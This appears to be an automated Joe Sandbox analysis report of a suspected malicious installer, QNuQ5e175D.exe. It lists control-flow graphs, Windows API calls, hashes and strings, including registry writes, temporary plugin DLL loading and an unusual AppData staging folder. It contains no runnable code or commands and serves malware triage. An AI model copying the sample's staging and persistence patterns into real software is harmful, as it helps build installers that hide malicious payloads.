                                                          • Instruction ID: 446d876c474c9d83549856ad9cac23e68bb7371358ae7480bd0e7fa7c4692e5e
                                                          • Opcode Fuzzy Hash: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
                                                          • Instruction Fuzzy Hash: 1D212A7150010ABFDF129F90CE89EEF7A7DEB54388F110076B909B21E0E7B58E54AA64

                                                          Control-flow Graph

                                                          control_flow_graph 1009 6fc41817-6fc41856 call 6fc41bff 1013 6fc41976-6fc41978 1009->1013 1014 6fc4185c-6fc41860 1009->1014 1015 6fc41862-6fc41868 call 6fc4243e 1014->1015 1016 6fc41869-6fc41876 call 6fc42480 1014->1016 1015->1016 1021 6fc418a6-6fc418ad 1016->1021 1022 6fc41878-6fc4187d 1016->1022 1023 6fc418cd-6fc418d1 1021->1023 1024 6fc418af-6fc418cb call 6fc42655 call 6fc41654 call 6fc41312 GlobalFree 1021->1024 1025 6fc4187f-6fc41880 1022->1025 1026 6fc41898-6fc4189b 1022->1026 1030 6fc418d3-6fc4191c call 6fc41666 call 6fc42655 1023->1030 1031 6fc4191e-6fc41924 call 6fc42655 1023->1031 1047 6fc41925-6fc41929 1024->1047 1028 6fc41882-6fc41883 1025->1028 1029 6fc41888-6fc41889 call 6fc42b98 1025->1029 1026->1021 1032 6fc4189d-6fc4189e call 6fc42e23 1026->1032 1036 6fc41885-6fc41886 1028->1036 1037 6fc41890-6fc41896 call 6fc42810 1028->1037 1043 6fc4188e 1029->1043 1030->1047 1031->1047 1040 6fc418a3 1032->1040 1036->1021 1036->1029 1046 6fc418a5 1037->1046 1040->1046 1043->1040 1046->1021 1052 6fc41966-6fc4196d 1047->1052 1053 6fc4192b-6fc41939 call 6fc42618 1047->1053 1052->1013 1055 6fc4196f-6fc41970 GlobalFree 1052->1055 1059 6fc41951-6fc41958 1053->1059 1060 6fc4193b-6fc4193e 1053->1060 1055->1013 1059->1052 1062 6fc4195a-6fc41965 call 6fc415dd 1059->1062 1060->1059 1061 6fc41940-6fc41948 1060->1061 1061->1059 1063 6fc4194a-6fc4194b FreeLibrary 1061->1063 1062->1052 1063->1059
                                                          APIs
                                                            • Part of subcall function 6FC41BFF: GlobalFree.KERNEL32(?), ref: 6FC41E74
                                                            • Part of subcall function 6FC41BFF: GlobalFree.KERNEL32(?), ref: 6FC41E79
                                                            • Part of subcall function 6FC41BFF: GlobalFree.KERNEL32(?), ref: 6FC41E7E
                                                          • GlobalFree.KERNEL32(00000000), ref: 6FC418C5
                                                          • FreeLibrary.KERNEL32(?), ref: 6FC4194B
                                                          • GlobalFree.KERNEL32(00000000), ref: 6FC41970
                                                            • Part of subcall function 6FC4243E: GlobalAlloc.KERNEL32(00000040,?), ref: 6FC4246F
                                                            • Part of subcall function 6FC42810: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,6FC41896,00000000), ref: 6FC428E0
                                                            • Part of subcall function 6FC41666: wsprintfW.USER32 ref: 6FC41694
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1977389511.000000006FC41000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FC40000, based on PE: true
                                                          • Associated: 00000000.00000002.1977358248.000000006FC40000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000000.00000002.1977514250.000000006FC44000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000000.00000002.1977627868.000000006FC46000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6fc40000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: Global$Free$Alloc$Librarywsprintf
                                                          • String ID:
                                                          • API String ID: 3962662361-3916222277
                                                          • Opcode ID: 689d51eade2dcf513090996544a4414b9a032dfb822fd69a1a01b8520a79a23e
                                                          • Instruction ID: 734fd7d05987b2df0b1b2fdebfc58133fec4009e84d2201e886d24fe1716b9d5
                                                          • Opcode Fuzzy Hash: 689d51eade2dcf513090996544a4414b9a032dfb822fd69a1a01b8520a79a23e
                                                          • Instruction Fuzzy Hash: 004180719003459BDB129F7CD884BD537A8BF05368F044566EE99DA0C6FB74E1ACCB60

                                                          Control-flow Graph

                                                          control_flow_graph 1066 4024af-4024e0 call 402dcb * 2 call 402e5b 1073 4024e6-4024f0 1066->1073 1074 402c4f-402c5e 1066->1074 1075 4024f2-4024ff call 402dcb lstrlenW 1073->1075 1076 402503-402506 1073->1076 1075->1076 1079 402508-402519 call 402da9 1076->1079 1080 40251a-40251d 1076->1080 1079->1080 1084 40252e-402542 RegSetValueExW 1080->1084 1085 40251f-402529 call 4032d9 1080->1085 1088 402544 1084->1088 1089 402547-402628 RegCloseKey 1084->1089 1085->1084 1088->1089 1089->1074
                                                          APIs
                                                          • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp,00000023,00000011,00000002), ref: 004024FA
                                                          • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp,00000000,00000011,00000002), ref: 0040253A
                                                          • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp,00000000,00000011,00000002), ref: 00402622
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: CloseValuelstrlen
                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp
                                                          • API String ID: 2655323295-469814226
                                                          • Opcode ID: 2d5a3a6cbba744cb4f49549abd2315f3a0bbe869b0ca912842418fb0edf1760d
                                                          • Instruction ID: 9ef1a868ac7dccf2a0d827ba333ec8444b87bd6dca13d8647f6a5f0896484b93
                                                          • Opcode Fuzzy Hash: 2d5a3a6cbba744cb4f49549abd2315f3a0bbe869b0ca912842418fb0edf1760d
                                                          • Instruction Fuzzy Hash: DF11B131D00119BEEF00AFA1DE4AAAEB6B4EF44318F20443FF404B61D1D7B88E009A68
                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 004060B4
                                                          • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403550,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040383C), ref: 004060CF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: CountFileNameTempTick
                                                          • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                          • API String ID: 1716503409-678247507
                                                          • Opcode ID: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                                          • Instruction ID: 0f0e971a11aa9000600537ad3b21051f2e76e4828209a3ca974843c19b3e0847
                                                          • Opcode Fuzzy Hash: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                                          • Instruction Fuzzy Hash: B5F09076B40204BBEB00CF69ED05F9EB7ACEBA5750F11803AE901F7180E6B099648768
                                                          APIs
                                                            • Part of subcall function 00405EF1: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp,?,00405F65,C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp,C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405CA3,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\QNuQ5e175D.exe"), ref: 00405EFF
                                                            • Part of subcall function 00405EF1: CharNextW.USER32(00000000), ref: 00405F04
                                                            • Part of subcall function 00405EF1: CharNextW.USER32(00000000), ref: 00405F1C
                                                          • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040163F
                                                            • Part of subcall function 00405ACB: CreateDirectoryW.KERNELBASE(00437800,?), ref: 00405B0D
                                                          • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\skattekode\Rygtets222\overstadigeres,?,00000000,000000F0), ref: 00401672
                                                          Strings
                                                          • C:\Users\user\AppData\Local\skattekode\Rygtets222\overstadigeres, xrefs: 00401665
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                          • String ID: C:\Users\user\AppData\Local\skattekode\Rygtets222\overstadigeres
                                                          • API String ID: 1892508949-2593783087
                                                          • Opcode ID: 522b783c9de46c7eb01671ee67dcdc22f4b8e2acc15c0cd2b2b5e6563b12514b
                                                          • Instruction ID: 104414052cab316a424bfe0d2ff1de268c148956b102069c6a2fab9df067ebf3
                                                          • Opcode Fuzzy Hash: 522b783c9de46c7eb01671ee67dcdc22f4b8e2acc15c0cd2b2b5e6563b12514b
                                                          • Instruction Fuzzy Hash: 0911BE31804514ABCF206FA5CD01AAE36B0EF14368B25493BE941B22F1C63A4A41DA5D
                                                          APIs
                                                          • RegQueryValueExW.KERNELBASE(?,00000000,00000000,?,?,00000800,00000000,?,?,?,?,Call,?,00000000,004066B6,80000002), ref: 0040648B
                                                          • RegCloseKey.KERNELBASE(?), ref: 00406496
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: CloseQueryValue
                                                          • String ID: Call
                                                          • API String ID: 3356406503-1824292864
                                                          • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                          • Instruction ID: 39ab2095516423f533248995afa5b88f9e2e33bd0920f2eea258779ff0fd120f
                                                          • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                          • Instruction Fuzzy Hash: AB017C72500209AADF21CF51CC09EDB3BACFB55364F01803AFD1AA21A0D778D964DBA8
                                                          APIs
                                                          • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402128
                                                            • Part of subcall function 004055FC: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp\System.dll,00000000,00425A20,74DF23A0,?,?,?,?,?,?,?,?,?,0040343D,00000000,?), ref: 00405634
                                                            • Part of subcall function 004055FC: lstrlenW.KERNEL32(0040343D,Skipped: C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp\System.dll,00000000,00425A20,74DF23A0,?,?,?,?,?,?,?,?,?,0040343D,00000000), ref: 00405644
                                                            • Part of subcall function 004055FC: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp\System.dll,0040343D,0040343D,Skipped: C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp\System.dll,00000000,00425A20,74DF23A0), ref: 00405657
                                                            • Part of subcall function 004055FC: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp\System.dll), ref: 00405669
                                                            • Part of subcall function 004055FC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040568F
                                                            • Part of subcall function 004055FC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004056A9
                                                            • Part of subcall function 004055FC: SendMessageW.USER32(?,00001013,?,00000000), ref: 004056B7
                                                          • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00402139
                                                          • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 004021B6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                          • String ID:
                                                          • API String ID: 334405425-0
                                                          • Opcode ID: 67a013c8050cadbf48abc2068aad44e6bd126c58b8073b2edd87dd65272e994b
                                                          • Instruction ID: ae41dde4eff0046a081fa93f434b6203791b13f397c20c3345ef6f3f33f6a532
                                                          • Opcode Fuzzy Hash: 67a013c8050cadbf48abc2068aad44e6bd126c58b8073b2edd87dd65272e994b
                                                          • Instruction Fuzzy Hash: 4B21A131904104EACF10AFA5CF89A9E7A71BF44369F30413BF105B91E5CBBD99829A2D
                                                          APIs
                                                          • GlobalFree.KERNEL32(00000000), ref: 00401C30
                                                          • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401C42
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: Global$AllocFree
                                                          • String ID: Call
                                                          • API String ID: 3394109436-1824292864
                                                          • Opcode ID: b2bf5aa3fb98d5d7659b4efbfb09c2738223d3c1d5b8947c58a47baf3ffb3ed2
                                                          • Instruction ID: b741a03fd702b7c6772e3f95c256d95ec8b7de3af2fdc922703a565136a7d287
                                                          • Opcode Fuzzy Hash: b2bf5aa3fb98d5d7659b4efbfb09c2738223d3c1d5b8947c58a47baf3ffb3ed2
                                                          • Instruction Fuzzy Hash: 9521F372904150EBDB20ABA4EE85E6E33B8AB04718715063FF542B72D5C7BCE8409B9D
                                                          APIs
                                                            • Part of subcall function 004068D4: FindFirstFileW.KERNELBASE(74DF3420,0042FAB8,C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp,00405F97,C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp,C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp,C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405CA3,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 004068DF
                                                            • Part of subcall function 004068D4: FindClose.KERNELBASE(00000000), ref: 004068EB
                                                          • lstrlenW.KERNEL32 ref: 00402364
                                                          • lstrlenW.KERNEL32(00000000), ref: 0040236F
                                                          • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 00402398
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: FileFindlstrlen$CloseFirstOperation
                                                          • String ID:
                                                          • API String ID: 1486964399-0
                                                          • Opcode ID: 8ce371ef362fb3a0bf5470d2f9de7d7a8b9c8f0d3a32a51a843dbca6af91aa01
                                                          • Instruction ID: efc15b5f6e7b569f76b1b900a6dd714e3f258eaed93f5a56bcbfb146dffa85c7
                                                          • Opcode Fuzzy Hash: 8ce371ef362fb3a0bf5470d2f9de7d7a8b9c8f0d3a32a51a843dbca6af91aa01
                                                          • Instruction Fuzzy Hash: 94118671914318AADB00EFF58D0AA9EB7F8AF04314F10443FA405F71D5D7B8C9418B69
                                                          APIs
                                                          • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025F6
                                                          • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 00402609
                                                          • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp,00000000,00000011,00000002), ref: 00402622
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: Enum$CloseValue
                                                          • String ID:
                                                          • API String ID: 397863658-0
                                                          • Opcode ID: b3e66f98151b13811c6deab5670c9eebffc93282c8efb5a28582c7ee2f6ef350
                                                          • Instruction ID: 66810f11062e6ea255b80fddf1e3d4c9698f673e023b75e7ff91682f7f8ae36f
                                                          • Opcode Fuzzy Hash: b3e66f98151b13811c6deab5670c9eebffc93282c8efb5a28582c7ee2f6ef350
                                                          • Instruction Fuzzy Hash: 43017C71A04615ABEB149F94DE58AAFB668EF80348F10443EF101B61D0D7B85E41976D
                                                          APIs
                                                          • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 00402580
                                                          • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp,00000000,00000011,00000002), ref: 00402622
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: CloseQueryValue
                                                          • String ID:
                                                          • API String ID: 3356406503-0
                                                          • Opcode ID: 49ca1381ded4af27f8ac224b17b3ae694fb74f22b67379b644ce572c4f680cb7
                                                          • Instruction ID: 5bae25e85081f80c41e61f77185b89043c8d74e7c66b6edfbb666f5a0c3c1719
                                                          • Opcode Fuzzy Hash: 49ca1381ded4af27f8ac224b17b3ae694fb74f22b67379b644ce572c4f680cb7
                                                          • Instruction Fuzzy Hash: 45118C71904216EADF15DFA0CA599AEB7B4FF04348F20443FE402B62D0D3B84A45DB9E
                                                          APIs
                                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                          • SendMessageW.USER32(0040A2D8,00000402,00000000), ref: 004013F4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID:
                                                          • API String ID: 3850602802-0
                                                          • Opcode ID: a48e27458ca857e7bf1c95edfaa4f4fc3f64b4f364872359a8149092e2b898a4
                                                          • Instruction ID: 0adee223d2b7ba7d815a442a2885e1f2b60e3b86eb1a18037e9b6c54a102055c
                                                          • Opcode Fuzzy Hash: a48e27458ca857e7bf1c95edfaa4f4fc3f64b4f364872359a8149092e2b898a4
                                                          • Instruction Fuzzy Hash: 0E01FF31620220AFE7195B389E05B6B3698E710329F10863FF851F62F1EA78DC429B4C
                                                          APIs
                                                          • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040247B
                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00402484
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmp
